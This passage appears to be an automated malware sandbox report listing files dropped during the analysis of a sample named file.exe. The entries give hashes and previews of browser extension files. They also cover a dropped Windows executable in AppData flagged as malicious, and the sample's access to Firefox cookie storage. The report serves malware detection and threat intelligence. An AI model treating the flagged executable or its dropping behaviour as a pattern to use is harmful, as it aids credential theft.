                                                                                        Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\offscreendocument.html

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:HTML document, ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):97
                                                                                        Entropy (8bit):4.862433271815736
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                        MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                        SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                        SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                        SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\offscreendocument_main.js

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text, with very long lines (4369)
                                                                                        Category:dropped
                                                                                        Size (bytes):95567
                                                                                        Entropy (8bit):5.4016395763198135
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:Ftd/mjDC/Hass/jCKLwPOPO2MCeYHxU2/NjAGHChg3JOzZ8:YfjCKdHm2/NbHCIJo8
                                                                                        MD5:09AF2D8CFA8BF1078101DA78D09C4174
                                                                                        SHA1:F2369551E2CDD86258062BEB0729EE4D93FCA050
                                                                                        SHA-256:39D113C44D45AE3609B9509ED099680CC5FCEF182FD9745B303A76E164D8BCEC
                                                                                        SHA-512:F791434B053FA2A5B731C60F22A4579F19FE741134EF0146E8BAC7DECAC78DE65915B3188093DBBE00F389A7F15B80172053FABB64E636DD4A945DBE3C2CF2E6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:'use strict';function aa(){return function(){}}function l(a){return function(){return this[a]}}var n;function ba(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=da(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\page_embed_script.js

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):4.65176400421739
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\service_worker_bin_prod.js

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:ASCII text, with very long lines (4369)
                                                                                        Category:dropped
                                                                                        Size (bytes):103988
                                                                                        Entropy (8bit):5.389407461078688
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:oXWJmOMsz9UqqRtjWLqj74SJf2VsxJ5BGOzr61SfwKmWGMJOaAFlObQ/x0BGm:yRqr6v3JnVzr6wwfMtkFSYm
                                                                                        MD5:EA946F110850F17E637B15CF22B82837
                                                                                        SHA1:8D27C963E76E3D2F5B8634EE66706F95F000FCAF
                                                                                        SHA-256:029DFE87536E8907A612900B26EEAA72C63EDF28458A7227B295AE6D4E2BD94C
                                                                                        SHA-512:5E8E61E648740FEF2E89A035A4349B2E4E5E4E88150EE1BDA9D4AD8D75827DC67C1C95A2CA41DF5B89DE8F575714E1A4D23BDE2DC3CF21D55DB3A39907B8F820
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:'use strict';function k(){return function(){}}function n(a){return function(){return this[a]}}var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=da(this);function t(a,b){if(b)a:{var c=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_2100238334\514a7034-a1b0-4622-ba4d-c19fa8c64786.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:Google Chrome extension, version 3
                                                                                        Category:dropped
                                                                                        Size (bytes):11185
                                                                                        Entropy (8bit):7.951995436832936
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_2100238334\CRX_INSTALL\_metadata\verified_contents.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1753
                                                                                        Entropy (8bit):5.8889033066924155
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_2100238334\CRX_INSTALL\content.js

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):9815
                                                                                        Entropy (8bit):6.1716321262973315
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_2100238334\CRX_INSTALL\content_new.js

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):10388
                                                                                        Entropy (8bit):6.174387413738973
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_2100238334\CRX_INSTALL\manifest.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):962
                                                                                        Entropy (8bit):5.698567446030411
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                        C:\Users\user\AppData\Local\Temp\tmpaddon

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):453023
                                                                                        Entropy (8bit):7.997718157581587
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:tESTeqTI2r4ZbCgUKWKNeRcPMb6qlV7hVZe3:tEsed2Xh9/bdzZe3
                                                                                        MD5:85430BAED3398695717B0263807CF97C
                                                                                        SHA1:FFFBEE923CEA216F50FCE5D54219A188A5100F41
                                                                                        SHA-256:A9F4281F82B3579581C389E8583DC9F477C7FD0E20C9DFC91A2E611E21E3407E
                                                                                        SHA-512:06511F1F6C6D44D076B3C593528C26A602348D9C41689DBF5FF716B671C3CA5756B12CB2E5869F836DEDCE27B1A5CFE79B93C707FD01F8E84B620923BB61B5F1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:PK.........bN...R..........gmpopenh264.dll..|.E.0.=..I.....1....4f1q.`.........q.....'+....h*m{.z..o_.{w........$..($A!...|L...B&A2.s.{..Dd......c.U.U..9u.S...K.l`...../.d.-....|.....&....9......wn..x......i.#O.+.Y.l......+....,3.3f..\..c.SSS,............N...GG...F.'.&.:'.K.Z&.>.@.g..M...M.`...*.........ZR....^jg.G.Kb.o~va.....<Z..1.#.O.e.....D..X..i..$imBW..Q&.......P.....,M.,..:.c...-...\......*.....-i.K.I..4.a..6..*...Ov=...W..F.CH.>...a.'.x...#@f...d..u.1....OV.1o}....g.5.._.3.J.Hi.Z.ipM....b.Z....%.G..F................/..3.q..J.....o...%.g.N.*.}..).3.N%.!..q*........^I.m..~...6.#.~+.....A...I]r...x..*.<IYj....p0..`S.M@.E..f.=.;!.@.....E..E....... .0.n....Jd..d......uM.-.qI.lR..z..=}..r.D.XLZ....x.$..|c.1.cUkM.&.Qn]..a]t.h..*.!.6 7..Jd.DvKJ"Wgd*%n...w...Jni.inmr.@M.$'Z.s....#)%..Rs..:.h....R....\..t.6..'.g.........Uj+F.cr:|..!..K.W.Y...17......,....r.....>.N..3.R.Y.._\...Ir.DNJdM... .k...&V-....z.%...-...D..i..&...6....7.2T).>..0..%.&.

                                                                                        C:\Users\user\AppData\RoamingCBGCBGCAFI.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1929728
                                                                                        Entropy (8bit):7.950023055229562
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:Hp1xNjgKwcs8ktH3FxhFb+9pzyqUnntttX0o:Jr+3csfVVxXbmp2q05X0o
                                                                                        MD5:927614BDB1FFF68B49468BC4A3886F36
                                                                                        SHA1:E684E796B2D93374C80E94D5B77FDD50C194A0D4
                                                                                        SHA-256:30B7B1795AF4FA8F43CDF9595F5A266DDFA407E9E3BAB55B0684618EFC6BBD0D
                                                                                        SHA-512:B8C84B98902D8B9B942D8B928A65E7F23465D773F9751F64695E011717AC84257D9D736781C7E9C239ED27B481F1C7FCA5A62A2EA3F255797F868E6D7A7829E7
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                        Reputation:unknown
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f.............................pL...........@...........................L.....>.....@.................................X...l............................WL.............................LWL..................................................... . ............................@....rsrc...............................@....idata ............................@... .P+.........................@...qhedmxhi.`....2..Z..................@...aflvgrfd.....`L......L..............@....taggant.0...pL.."...P..............@...........................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):24
                                                                                        Entropy (8bit):3.91829583405449
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                        MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                        SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                        SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                        SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"schema":6,"addons":[]}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):24
                                                                                        Entropy (8bit):3.91829583405449
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                        MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                        SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                        SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                        SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"schema":6,"addons":[]}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\store.json.mozlz4 (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                        Category:dropped
                                                                                        Size (bytes):66
                                                                                        Entropy (8bit):4.837595020998689
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                        MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                        SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                        SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                        SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\store.json.mozlz4.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                        Category:dropped
                                                                                        Size (bytes):66
                                                                                        Entropy (8bit):4.837595020998689
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                        MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                        SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                        SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                        SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json (copy)

                                                                                        Download File
                                                                                        Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):36830
                                                                                        Entropy (8bit):5.185052013683835
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:AI4wvfCXh496G4C4U1W4z4xuHhvp4N4Tc4Z4S4t24U:AruBv3
                                                                                        MD5:10E2D85FEF0DB266E519048D63617FA8
                                                                                        SHA1:EBB307C44EBEFFA271AC58FDDE5C3A1BA52AE7B0
                                                                                        SHA-256:92143A48F55639B5BD01385D0E4E78EDED4F84401A91C12AC06251EE188CFE0E
                                                                                        SHA-512:164CBE725B44020AD40D165A1B1C242A7016ED8933AB9502D0D38E6CD99887D9DF49533DE54068AA4E5D8476C7791B52518A8477B8961475B7CB2C3AF54B81B1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
